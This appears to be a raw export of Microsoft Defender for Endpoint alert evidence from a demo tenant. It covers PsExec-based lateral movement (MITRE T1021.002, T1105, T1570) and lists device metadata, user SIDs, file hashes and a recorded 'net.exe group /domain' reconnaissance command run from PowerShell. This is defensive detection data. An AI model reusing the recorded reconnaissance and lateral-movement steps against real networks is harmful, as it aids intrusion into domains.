[ "T1021.002", "T1105", "T1570" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "Defender", "domainName": "MSDXV2" } ], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Medium", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } } ]
[ { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:19:56.86Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T08:19:56.86Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "NotFound", "remediationStatusDetails": "The system cannot find the file specified.,The system cannot find the file specified.", "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-11-11T08:19:56.86Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.9", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:52.4166667Z
Suspicious
Active
analyst
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
4f4970c3545972fea2bc1984d597fc810e6321e0
25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369
net.exe
C:\Windows\System32
7,736
"net.exe" group /domain
2022-09-30T06:11:52.1907173Z
4,064
2022-09-30T06:11:13.210308Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T05:12:05.38Z
Malicious
None
SYSTEM
NT AUTHORITY
S-1-5-18
null
null
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
PSEXESVC.exe
C:\Windows
8,284
PSEXESVC.exe
2022-11-18T05:10:14.6889142Z
620
2022-11-16T03:32:19.0279725Z
services.exe
C:\Windows\System32
Detected
36150b3c1b69b5c2da9df4efd86ac6c166924a48